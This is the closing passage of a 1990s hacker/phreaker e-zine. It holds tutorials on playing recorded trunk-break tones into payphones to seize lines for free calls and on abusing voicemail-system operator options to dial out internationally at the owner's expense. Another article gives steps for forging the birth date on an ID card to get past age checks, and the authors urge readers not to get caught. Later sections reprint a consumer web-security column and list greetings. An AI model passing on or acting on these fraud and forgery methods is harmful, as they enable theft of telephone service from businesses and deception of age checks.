One, Two, Three

Quickly stop the recording right after you say "three" now you gotta record
the break of your global country, so turn up your volume on your 3l337 pc
or 3l337 amiga :) and the second you press record on your tape recorder..
hit the "+" key a few times, depending on how you normally break the hcd,
ok cool, now make sure straight after you have recorded the break sequence
you press stop on your recorder and now get ready to tape the next part..

Four, Five, Six

STOP! and now get ready to record the tone dialing sequence (if your using
routing codes thats fine, just make sure you add in the other breaks on
your recorder, for eg: Seven, Eight, Nine, 2nd break) ok now press record
and quickly hit "enter" so you can record the dialing tones of your 3l337
contact!

Simple hah!? All you do now is go to a phone booth which is in the middle of
no where so no fuck is spying on your eliteness :) Setup your earphones (one
side in your ear the other on the mouthpiece of the phone) Rewind your tape,
PRESS PLAY listen to the 1,2,3 PRESS STOP now dial the HCD# you want to break,
as soon you hear the Operator PRESS PLAY, after seize PRESS STOP (if you need
to break it twice, press play again (like i said before it depends on the way
you normally would break the line) anyway once you have successfully seized
the line put the other earphone in your ear, listen to the.. 4,5,6 PRESS STOP!
put the earphone up to the phone again and PRESS PLAY, bINGO wE hAVE cONNECTED

DOOOOT, DOOOOOOOT "y0 h0WZ 1T g01NG!?" some other countries ring like
BRRRRR, BRRRRRRRR "y0 h0WZ 1T g01NG!?" but anyway you get the point :)

Yeaaah! excellent you've done it now if you are wondering why i say to record
your voice saying One, Two, Three and so on, its cause when some people box
they dont break on the operator, sometimes they break the line before the op
picks up, and you need good timing, so instead of having fucking hassles by
rewinding it all the time to find your break. Now you just find the 1,2,3 and
like so PRESS STOP, and the second you PRESS PLAY,. DootDeet !!!

The other reason is just incase you want to store other trunks on your micro
cassette (cause some people dont have global's so they need to do local dial
or use routing codes) and its easier to note down for example..

1,2,3>Italy 4,5,6>Alias 7,8,9>Hong Kong 10,11,12>Alias

Okay lets say for example you have to use Routing Codes, simple

1,2,3>South Africa 4,5,6>Routing Code 7,8,9>Sprint 10,11,12>Alias

I hope this doesnt confuse you, its just an easier way to take note and also
remember all your contacts stored on your cassette, which order and how many
different trunks are used.

"Good idea ][yPe" No problemo dudes, just dont get caught, have phun! tell
your 3l337 buddys, spread this ZiNE and stay phreaky!!!


_____/\__/\__/\__/\__/\__ ________[/ 18 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // VMB LOOP HOLES \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by ][yPe =-------\\---\---\---\---\--'

Do you remember when i said...

There are also outdialing options to use your vmb like its a PBX.
[PBX = private branch Xchange]

Well if you dont i'll refresh your memory, back in 94 when ToT first started
I wrote the article "V.M.S" and it was about hacking into Voice Mail Systems
which in other words refered as V.M.B [voice mail box] anyway what im trying
to say is that now i will show you "How To Use Outdialing Options" on a vMB!

Okay its sweet and simple, find a VMB, listen to the options once you hear
the stupid bitch say "Press 0 for further assistance" or "Press 9 for further
assistance" in other words "Press 0 for an operator" or "Press 9 to speak
to an operator" OR WHATEVER! Lets say you wanted to ring a number overseas
"Arrested Development" located in Netherlands you would do this (but i don't
really recommend doing this from home)

dial 0 (dont pause) 00-31-77547477 or
dial 9 (dont pause) 00-31-77547477

As you should already know most PBX systems dont allow you to dialout till
you press "1" so do this:

dial 0 (dont pause) 1-00-31-77547477 or
dial 9 (dont pause) 1-00-31-77547477

(I havent called this in ages, it could be changed by now) anyway do you
see the loop hole, instead of getting connected to an operator or extension
number you use their line to make a global call, which i do not recommend
BUT, as you can see if you do this from a payphone you can start some nice
conference calls and even get o.s dudes to call in and abuse it!!! cool aye?

Okay im not sure if this method works in other countries, Though i have a
feeling it should work on most vmb's in the UK :) I would be quite suprised
if people got this to work in the USA, oh and at the moment Iceman is test-
ing this method in Australia and hopefully he will find one with a loophole!

Note:
~`"'~
Another tip for you vMb hAck3rz out there, if you can't get the loop hole to
work then try scanning through different extensions till you reach a tone
because a while ago i tried ext #3005 because that was the last four digits
of the VMB i was using and guess what i tone came up, but it wasn't global
it only allowed national phone calls..

BTW: If some of you already knew these loop holes in vmb's, dont leave me a
stoopid fucken msg saying, "][yPe you idiot why did you give away that cool
secret to making free calls from a vmb" Well heres my answer..

The trick is OLD, it only works on the older type of mail systems..
Eg: Aspen and Meridian so if you can find those two metioned you might get
lucky! so now you must earn the credit by scanning for these! Understand, I
provide you with the TiPZ and TRiCKZ and you have to put some work into it
to realize the whole concept which is that phreaking is a learning experience
so thats why you must experiment and research to find more information! coz
iNFO iS POWER, AND PEOPLE LiKE YOU AND ME CONTROL iT! Got it? Good!


_____/\__/\__/\__/\__/\__ ________[/ 19 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // FAKE iD'Z! \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by oPium =-------\\---\---\---\---\--'

I was suposed to do this article for issue 3, But i fucked up as usual
sorry, Here it is ok

Get yourself an iD, Go to any Book Store, or Stationery Shop, And fuck the
beautiful assistant behind the counter (j.k) Ask the S.l.u.t.s for some
"Font-Tape" okay you probably dont see my point, i'll slowly explain. See
when you purchase the Tape make sure it is the same size as the digit's
of the D.O.B on your iD card.

A> Your original plastic card has got a birth date printed, So just scratch
off the YEAR digit's and leave the D/M digits..

If you want to be 20 and you are only 18, Simple (Eg: 22/07/79) was
your original birth date, Scratch off the 79 and use the Font-Tape to
make it 77. Paste the black "7" "9" font nice and close ..just like the
rest of the numbers.

B> Your original card has no D.O.B printed..

Cool, just use the Font Tape and paste eg: "2 2" "/" "0 7" "/" "7 7"
get my idea. Okay make sure you paste "D.O.B" on the left side of the
digits so that the bouncer or whoever, Knows it states your Birth Date!


_____/\__/\__/\__/\__/\__ ________[/ 20 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // CYBERSPACE \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by ][yPe =-------\\---\---\---\---\--'

<I got this from the Net, interesting read written By Fred Langa>

Personal security issues seem to generate more hype and misinformation than
just about any other area of the Web. TV, radio and the popular press would
have you believe that the Web is a carnival of password theft, credit card
fraud, e-mail snooping and so on.

Let me come right out and say it: It just ain't so. I believe that online
personal security problems are hugely overrated. Oh sure, bad things can
happen online, just as they do in the offline world. After all, the Web is a
reflection of society-no better, no worse-and all the same abuses that go on
in "meat space" also can happen in cyberspace. But online or off, you can
take simple, reasonable precautions to reduce or eliminate the dangers. I'll
prove it to you at the end of this column by offering you a chance to try to
snoop one of my private files!

But first, let's compare some risks. Take your credit card information, for
example. You run a risk any time you give your credit card to a waiter or
waitress or salesperson-if they're dishonest, they can run off extra copies of
your imprint or jot down your numbers to use later without your knowledge.
But that hardly ever happens. You also run a risk when you read your credit
card numbers to a shop-by-catalog phone clerk. It's theoretically possible for
someone to tap your line or listen in on the conversation, or for the clerk to
appropriate your numbers for his own use. But that also hardly ever happens.

Likewise, if you transmit your credit card data over an open, insecure
Internet link, it's possible (difficult, but theoretically possible) for some
one on the Web to "listen in" on your link and grab your numbers, or tap into
the account information in a sales-oriented Web site. But you know, that
hardly ever happens either. There's no special "extra" risk involved with the
online transaction. Given the ratio of Web users to phone users (a few tens of
millions to many hundreds of millions), your phone fraud risks are probably
much higher than Web fraud risks.

Or take passwords. In the real world, if you're careless in using an ATM
(cash machine) or long-distance card, someone peering over your shoulder can
memorize your account code and PIN, and drain your account or run up your
phone bill. Likewise, if you're careless online with your passwords, it's
theoretically possible for someone to peer over your virtual shoulder and
steal the information for nefarious purposes. Real world or on the Web, it's
the same risk.

Rather than rare high-profile problems like these, the real risks of being
online are usually more subtle-they involve prosaic issues like downloading
a file with a virus in it, running a rogue Java or ActiveX applet and
accidentally sending or receiving information intended for someone else.
What can you do about these less flashy but more common problems?

Well, lots. Note that I'm not referring here to heavy-duty corporate solutions
but rather to security-enhancing steps we all can take. It's a huge topic, so
we've asked WinMag contributor Karen Kenworthy to pull together a
comprehensive feature on online security, and she's working on it now. Her
story will appear next month, but in the meantime, here are some great first
steps:

Perhaps the single most important thing you can do is make sure you're using
a current browser. For example, both Navigator/Communicator and Internet
Explorer offer reasonable safeguards for conducting online commerce (that is,
the ability to connect to and exchange encrypted data with secure servers).
Both also offer personal certificates to help you reliably identify yourself
in online communications and transactions, and both work with third-party
products to let you virus-check files you're downloading. Both offer varying
degrees of code signing and code certificates to help you verify the
authenticity of applets or active content you might encounter. Both give you
the ability to know when a site is requesting information from your browser
or is seeking to track your usage patterns, and so on. Both browsers work;
the choice is yours. For a much fuller overview of many browser security
features, including the difference between Navigator/Communicator and Internet
Explorer, check out the security section of BrowserTune at
http://www.winmag.com/flanga/bt97/bt810.htm.

What about when you're online but not using a browser? For sensitive e-mail
or file sharing, there's an absolute boatload of excellent free and low-cost
encryption products that will lock your data from all but the most determined
and sophisticated attacks. For example, check out Kremlin, a $10 shareware
package that supports eight encryption algorithms, including DES, Blowfish,
PGP and RC4 (used in browsers). You can grab a copy from WinMag's
Superior Shareware library at
http://www.winmag.com/cgi-shl/download.pl/superior/1997/9707jul/krem106.zip.

Ten bucks is peanuts, but you may not have to spend even that much to
increase your security if you don't mind taking an extra step or two. For
example, if you're already using a product like PKZip or WinZip to compress
the files you send electronically, try using the Zip software's password
feature. While less secure than a true encryption process, a password-
protected ZIP file will thwart casual snoopers and most amateur hackers.
Send the password to your recipients in separate e-mail, or-if you're really
paranoid-by phone.

Better yet, you can combine methods for particularly sensitive information:
Place a password-protected ZIP file inside an encrypted file or e-mail (or
vice versa), and you've made it that much harder for an unauthorized person
to crack your data.

If you want to see for yourself, try opening my files at
http://www.winmag.com/flanga/security.htm. The files use no exotic, high-end
cryptography. In fact, one file isn't encrypted at all, another was scrambled
with literally decade-old technology, and another used a $5 piece of share-
ware to protect it. Yet even this very basic level of protection is enough to
thwart most casual snoops. See if you can crack 'em-and see for yourself how
easy it is to protect your private information!


_____/\__/\__/\__/\__/\__ ________[/ 21 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // GREETZ \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by ][yPe =-------\\---\---\---\---\--'

Digit0ne..bAD¢lANGUAGE..Maelstrom..Chotaire..xalas..echo0ff..DaXX..Evilive
Brain Surgeon..DaPhisher..razor..dj sPooky..hMC..Scavenger..oPium..scratch
GreyRat..kaotik..RaDiX..CRaZY..kRy0..Cru-l-t..RESiST0R..Mr_Milk..DarkCyde
Dea)(alm..NoSTRoMo..SNoWMaN..StiGZ..blackhaze..DemonPhreaker..cRomm..
Chemical..Neophyte..Iceman..Omega..mann1..XanTh..Accident..ACiD KiD..natas
GrassHopper..Energizer..MutantX..gvyt..natas..Darkman..Quetzal..ZaP..bLaDe
Overdose..VanHauser..BaDS..Xtreme..MotioN..SaNDMaN..xxer..Ceo..Chris Mal-
icious..Debbie..Penguin..Kurupt..Ryloth..abrupt..Raiden..CaNaaN..dmouse..
MiCro..HiTraject..aDEPT..smut..qwik..Dansken..Aggressor..|Zer0|..Sir0..

...and all the r0q0rz that hang in #bluebox and #ganja


_____/\__/\__/\__/\__/\__ ________[/ 22 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // LAST WORD'Z! \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by ][yPe =-------\\---\---\---\---\--'

h3y CoNRadZ!!
~`"'~`"'~`"'~
We finally come to an end. <sod> but look on the bright side you can keep
hacking and phreaking and using our nice ideas and trickz to assault and
phreak with adventure till the next issue which i have no fucking idea will
be released..

If you are wondering how to get in contact with any ToT members then its
easy since you already know our handle names and most of us have modem's
if you see one of us on a bbs or on irc, try #bluebox #hack #phreak leave
a msg and we will help you with what you need if we know it or got it.

Im fucking sorry to all our readers out there, its been a while since the
last release and most of you dudes would of thought we died out, but like
i've said in earlier issues, we wont give up so you've got nothing to worry
bout, except for the suspense and patience after each release :)

Whats been happening since the last issue? Nothing much apart from, a ex-
member getting a visit from the blueboys and Eon's drug bust, which i wont
talk bout cause its not really my business but if you want to know more
ask him for yourself. Also Telco has been updating their equipment and now
they have installed the HP AcceSS 7 which is a smart system to detect phone
phraud and trace calls quicker.

Is it a rumour or true that ToT is having a hp party? Yes it is true, but
im not sure when its gonna happen, me and dea)(alm are organising it to be
held in Wellington and there will be an entry fee of $5 - $10 including piss
and maybe a computer setup for 'break and enter' competitions. No f3dz are
invited!!!

Thats bout all i wanted to say apart from, i am still looking for a cool
coder that could code a decent LOADER for the mag, we already have the
loader for the Amiga, though we would like a PC version too!! Please send
me mail if you are capable enough to code a loader which has smooth scroll
and music options..

ToT WEB SiTE:
~`"'~`"'~`"'~
Yes! very soon we will have a WEBSiTE dedicated to our readers and members
of ToT it will have all the issues online, including some coded programs
done by some of the members and also updated information bout the NZ h/p/a
scene.. look out for: www.mulysa.gen.nz/~tot (coming soon)

Okaaaay, that bout wraps it up!

Oh make sure you check out DNIC.EXE, created by dea)(alm, a nice listing of
the Data Network ID Codes..

Contact me at this email addie: qwid@mulysa.gen.nz (currently down)
I prefer you use pGp, so pl33z *eNcRyPt* *anything* you have for me. thx!


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzO1kzEAAAEEAOcO47d7xw+w1Z/J3qKt6CG5CyfLG8DHOYwCcMjU0HvS10Nt
3+nuqZxOpXxX7WoU4TJ5vBAvMMMvZ3uMCllq4TpwlmfoAYD4/EUW7yqDelwaY7T4
uFafMCzpEoJxVr6quoSi9V/yXfPD5BKcsFZQllpmTkuVnI9x9Vvsf2aSyX6JAAUR
tARoeXBl
=TSmk
-----END PGP PUBLIC KEY BLOCK-----


°Û±±°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÜÜ
ܱ±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°²Ü
ܲ²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±ÛßÜ
ܲ²²²Û±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±ÛÛÛÜÜ
ܱ²²²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±±°±ÛÜÜ
±±±²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±±²²ÛÜ
°°±±²²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²Û²²²ßÛ
°°±²²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²±±±²²ÛÛÛÛÛÛÛÛÛÛÛ²ÛÛÛÛ²Û±ÛÛ
°°°±²±²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²Û±±²ÛÛÛÛÛÛÛÛÛÛ±ÛÛÛÛ±²²ÛÛÛ
°°°±±±±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²ÛÛ±²±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²Û±ÛÛ
°°±±²±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±²±ÛÛÛÛÛÛÛÛÛÛÛÛÛ²²±ÛÛ
°°±²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±±±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±ÛÛ
°°±²²ÛÛÛÛÛÛÛÛÛÛÛÛÛ°±ÛÛ²²²ÛÛÛÛÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ±±²±
°°±±²²ÛÛÛÛÛÛÛÛÛÛÛ°²²²²²²Û²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²²±
°°±±²²ÛÛÛÛÛÛÛÛÛÛÛ°±±²²²²Û²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²²±
°°±±²²ÛÛÛÛÛÛÛÛÛÛ°°±²²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²±±
°°±±±²²ÛÛÛÛÛÛÛÛ±°±²²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²±Û
°°±±±²²ÛÛÛÛÛÛÛ²°±²²Û²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²²±Û
² °°°±±±²²ÛÛÛÛ²°±²²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²²²²±ÛÛ
²² °°°±±±²²²±°±±±²²²ÛÛßßßÛ±±±±±±²²²ÛÛÛÛÛÛÛÛÛÛÛÛÛ²²²²²²±ÛÛ
²²± °°°±±²²°ß°°°°±±²²ÛÜÜÜÜÜ ß°°°°°±²ÛÛÛÛÛÛÛ±±²²²²²±±ÛÛ
²²± Üܱ²²ÛÛ±Ü ßß°°°±±²²²ÛÛÛÛÜÜ ßß°°±±²²Û²Û±°°±²²²±ÛÛÛ
² Ü°±±²²ÛÛÛÛ²±Ý ß°°°°°±±±±²²²ÛÜ ß°°±±±ß±°°±²²±±ÛßßÛ
°°±±²ÛÛÛÛÛÛÛ²± ßßß°°°±±±±²ÛÛÜÜÜ ß°ÞßÜ°±²ÛÛ Û
°°±±²ÛÛÛÛÛÛÛÛÛ±Ü ßß°°°±±±±²²ÛÛ ÞßÜ°±²ÛÛ ÛÛ²
°°±±²²ÛÛÛÛÛÛÛÛÛ²±Ü ßß°°°±±²²²Û ݱ±²ß ²²²
°°±±²²ÛÛÛÛÛÛÛÛÛ²±±Ü ß°ßßßßÜßÛß Þß
°°±±±²²²ÛÛÛÛÛÛÛÛ²²²±ÜÜÜ ÜÜÜÜÛÛ²±ÜßÛÜ ÜÛ
°°°°±±²²ÛÛÛÛÛÛ²²±°°ÛÛÛ±ÜÜÜÜÜÜÜÛÛ²²²²²ÛÛ°°Û²²ÜÜÛÛ
ß°°°°°±±±²ßßß ß°°±±±²²±±±Û²°±±²²²²Ûß±ÛÛÛÛ²²²²²ÜÜ
ßßßßßß °±²²²²²ÛÛÛÛ±²±²²²ß ²ÛÛÛÛÛÛÛ²²±°°
±²²ÛÛÛÛÛÛÛÛÛÛ²ßß Ü Þ²ÛÛÛÛ²²±±±°°
²²ÛÛÛ²ÛÛÛ²ÛÛÛ²Ü Ü²ÛÝ ²ÛÛß ßßßßßß
Û²ß ²Ûß²²ÛÛ²Û²²² ܲÛÛßÜÛÛÛ±
Û ÛÛ ²ÛÛß²²ÛÛÛ²ÛÛÛ²Û²²²ß
ÛÝ Û ÞÛÛ ²ÛÛÛ²²ÛÛß²Û²²
Û ÞÝ ÛÛÝ ÞÛÛÛ ÛÛ ÜÛÛ²Û
Ý ÛÛ ÛÛ ÛÛ ÛÛ Ûß
Û ÞÛ Û Û
Ý Û Û Û ToT - It had to happen sometime...

------------------------------------------------------------------------------

][yPe Founder/Editor/Writer/Artist

bAD lANGUAGE Co-Editor/Coder/Artist

Iceman Writer

PoSCA Writer/Coder

Dea)(alm Writer/Coder

oPium Writer

Mutant-X Writer

cRomm Writer

GreyRat Writer

Crazy Writer

Micro Writer/Trader

Chris Malicious Writer

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
- |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| -

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Latest Articles

Recent comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT